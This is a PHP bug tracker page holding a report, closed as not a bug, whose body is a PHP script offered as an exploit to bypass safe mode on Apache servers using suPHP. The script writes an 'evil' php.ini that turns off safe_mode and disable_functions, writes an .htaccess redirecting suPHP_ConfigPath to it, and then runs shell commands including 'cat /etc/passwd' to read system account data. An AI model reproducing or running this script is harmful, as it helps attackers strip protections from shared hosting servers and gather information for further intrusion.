|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2015-12-11 15:53 UTC] requinix@php.net
-Status: Open
+Status: Not a bug
-Package: PHP Language Specification
+Package: *General Issues
[2015-12-11 15:53 UTC] requinix@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat May 04 22:01:33 2024 UTC |
Description: ------------ apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit‎ <? /* apache 1.x <=> 2.x suphp (suPHP_ConfigPath) bypass safe mode exploit Author : Soufiane Boussali Facebook : fb.com/soufian.ckin2u */ echo "[+] Start... "; $bypfile=fopen(php.ini,w+); $stuffile=fopen(.htaccess,w+); if($bypfile and $stuffile!= NULL){ echo "[+] evil files created succes ! "; } else{ echo "[-] access denial ! "; } $byprullz1="safe_mode = OFF "; $byprullz2="disable_functions = NONE"; $dj=fwrite($bypfile,$byprullz1); $dj1=fwrite($bypfile,$byprullz2); fclose($bypfile); if($dj and $dj1!= NULL){ echo "[+] php.ini writed "; } else{ echo "[-] 404 php.ini not found ! "; } $breakrullz="suPHP_ConfigPath /home/user/public_html/php.ini"; // replace this /home/user/public_html by ur path $sf7=fwrite($stuffile,$breakrullz); fclose($stuffile); if($sf7!= NULL){ echo "[+] evil .htaccess writed "; echo "[+] exploited by success! "; echo " [+] discouvred by Hacker404 "; echo " [+] hackerone.com/hacker404 "; echo " [+] Facebook : fb.com/soufian.ckin2u "; } else{ echo "[-] evil .htaccess Not found! "; } system("pwd;ls -lia;uname -a;cat /etc/passwd"); #EOF ?> Risk : high Levele Soufiane Boussali Best Regards,